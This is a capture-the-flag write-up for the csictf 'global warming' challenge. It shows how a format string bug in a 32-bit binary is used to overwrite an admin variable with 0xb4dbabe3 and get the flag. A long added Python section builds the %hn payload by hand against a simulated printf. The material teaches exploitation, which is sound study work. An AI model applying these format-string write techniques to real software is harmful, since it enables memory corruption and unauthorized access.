Hello guys, this is a write-up for the global warming challenge. If you don't have the binary yet, download it from here (you will find the exploit there as well):
https://github.com/MaherAzzouzi/PWNing/tree/master/csictf
File :
We're dealing with a 32-bit binary that is not stripped, which makes reverse engineering it easier.
Checksec :
* PIE is disabled, so the binary's addresses (code, .data and .bss) are the same on every run; that is what lets us hardcode the address we write to.
Playing with the binary :
We can see that the binary suffers from a format string vulnerability: our input is passed to printf as the format string itself, so a %p leaks values from the stack.
Let's open up Ghidra and see what the binary actually does.
Reverse engineering :
Let's open up Ghidra, make a new project, name it "global-warming", open our binary file and click analyze.
Search for the main function and see what it's doing:
This is what main does: it reads 0x400 bytes of input into an array of 1024 bytes. Since 0x400 is exactly 1024, there is no buffer overflow here.
I'm more interested in the login() function.
This is what login() does:
* It compares the content of admin (which resides in the .bss section) to the constant -0x4b24541d; if they are equal, we get the flag.
If we double-click admin we get its address:
The value -0x4b24541d looks odd, but it is only Ghidra displaying the constant as a signed 32-bit integer; in two's complement -0x4b24541d is 0xb4dbabe3. Let's confirm that in gdb.
This is the login() disassembly in gdb:
We can see the cmp at login+38 comparing admin with 0xb4dbabe3, the unsigned form of the same constant.
Exploit :
To get the flag, all we need to do is write 0xb4dbabe3 to 0x0804c02c (admin). Since PIE is off, that address is fixed across runs.
To exploit it, all we have to do is this:
Because it's a 32-bit binary, a 4-byte marker is enough: I sent "AAAA" followed by a run of %p %p ... %p and looked for it in the leaked output.
Count the leaked values yourself and you will see 0x41414141 in the 12th position after AAAA, which means our buffer starts at printf argument offset 12. This offset depends on where the buffer sits relative to printf's stack frame, so always measure it for the binary at hand instead of reusing a number from another challenge.
Remember the number 12, we will be using it in the exploit.
Now we'll use pwntools to generate a payload that writes 0xb4dbabe3 to admin in just two lines of code :)
This is the final exploit: you simply call fmtstr_payload(12, writes), where 12 is the offset we calculated before and writes is a dictionary mapping where to write to what to write, {0x0804c02c: 0xb4dbabe3} in our case.
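As an added example (not the author's exploit, which is in the repo linked above, and not pwntools code), here is the whole chain written out by hand in Python against a toy model of the vulnerable printf call: the offset hunt with AAAA and a run of %p, and the two 16-bit %hn writes that fmtstr_payload generates for a 32-bit target. Only the admin address, the 0xb4dbabe3 constant, the 0x400 read size and the offset 12 come from the write-up; the stack layout, the junk values and the printf model (which only implements %c, %p and %hn, and no real libc) are constructed for the demonstration, and the model also runs for other offsets to show that the method does not depend on the number 12.

```python
import re
import struct

# Facts taken from the write-up (everything else below is a constructed model):
# PIE is off, admin lives in .bss at 0x0804c02c, login() compares it against
# 0xb4dbabe3, main() reads 0x400 bytes, our input is at printf arg offset 12.
ADMIN_ADDR = 0x0804C02C
WANTED = 0xB4DBABE3
OFFSET = 12
BUF_SIZE = 0x400

# Only the conversions the exploit needs: %Nc, %p and %K$hn.
_SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)(hn|c|p)")


class Target:
    """Toy model of a 32-bit printf(buf) call; not the real binary or libc."""

    def __init__(self, offset=OFFSET, buf_size=BUF_SIZE):
        self.offset = offset
        self.buf_size = buf_size
        self.mem = {}  # address -> byte value, only what %hn stores

    def printf(self, buf):
        """Run buf as a format string; returns what printf would print."""
        if len(buf) > self.buf_size:
            raise ValueError("main() only reads 0x400 bytes")
        # Constructed stack: offset-1 junk words, then our buffer split into
        # little-endian 4-byte varargs, like a 32-bit cdecl frame.
        junk = [0xDEADBEE0 + i for i in range(self.offset - 1)]
        padded = buf + b"\0" * (-len(buf) % 4)
        words = junk + list(struct.unpack("<%dI" % (len(padded) // 4), padded))
        fmt = buf.split(b"\0", 1)[0]  # printf stops at the first NUL byte
        out, count, next_arg, last = [], 0, 0, 0
        for m in _SPEC.finditer(fmt):
            literal = fmt[last:m.start()]  # literal bytes are printed and counted too
            out.append(literal)
            count += len(literal)
            last = m.end()
            pos, width, conv = m.groups()
            idx = int(pos) - 1 if pos else next_arg
            if not pos:
                next_arg += 1  # unnumbered conversions consume varargs in order
            arg = words[idx] if idx < len(words) else 0
            if conv == b"c":
                n = max(int(width or 1), 1)  # %43995c prints 43995 chars
                out.append(b" " * (n - 1) + bytes([arg & 0xFF]))
                count += n
            elif conv == b"p":
                s = b"0x%x" % arg
                out.append(s)
                count += len(s)
            else:  # %hn: store the low 16 bits of chars-written-so-far at *arg
                for i, b in enumerate(struct.pack("<H", count & 0xFFFF)):
                    self.mem[arg + i] = b
        out.append(fmt[last:])
        return b"".join(out)

    def read32(self, addr):
        return struct.unpack("<I", bytes(self.mem.get(addr + i, 0) for i in range(4)))[0]


def find_offset(target, n=20):
    """Step 1 of the write-up: AAAA then a run of %p, find where AAAA comes back."""
    leaked = target.printf(b"AAAA " + b"%p " * n).split()
    for i, word in enumerate(leaked[1:], start=1):  # leaked[0] is the echoed AAAA
        if word == b"0x41414141":
            return i
    return None


def build_write(offset, addr, value):
    """Step 2, what fmtstr_payload does for a 32-bit target, spelled out.

    Two 16-bit %hn writes, smaller half first so the char counter never has
    to wrap. The addresses go at the front because neither contains a NUL
    byte; otherwise printf would stop before reaching the conversions.
    """
    halves = [(addr, value & 0xFFFF), (addr + 2, value >> 16)]
    payload = b"".join(struct.pack("<I", a) for a, _ in halves)
    written = len(payload)
    fmt = b""
    for i, (_, half) in sorted(enumerate(halves), key=lambda t: t[1][1]):
        pad = (half - written) % 0x10000
        if pad:
            fmt += b"%%%dc" % pad  # pad the counter up to the wanted half
            written += pad
        fmt += b"%%%d$hn" % (offset + i)  # halves[i] sits at vararg offset+i
    return payload + fmt


def login_ok(target):
    """Mirror the cmp at login+38: flag only when admin == 0xb4dbabe3."""
    return target.read32(ADMIN_ADDR) == WANTED


if __name__ == "__main__":
    t = Target()
    off = find_offset(t)
    payload = build_write(off, ADMIN_ADDR, WANTED)
    t.printf(payload)
    print("offset", off, "payload", payload, "admin", hex(t.read32(ADMIN_ADDR)), login_ok(t))
```

Running it finds offset 12, builds the 34-byte payload (the two addresses followed by %43995c%12$hn%2296c%13$hn) and ends with admin holding 0xb4dbabe3. The two %hn writes cost about 46 KB of output, which is why format string payloads work in 16-bit halves: a single 32-bit %n would need the character counter to reach 0xb4dbabe3, roughly 3 GB of printed padding.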
Let's test the exploit remotely:
Enjoy !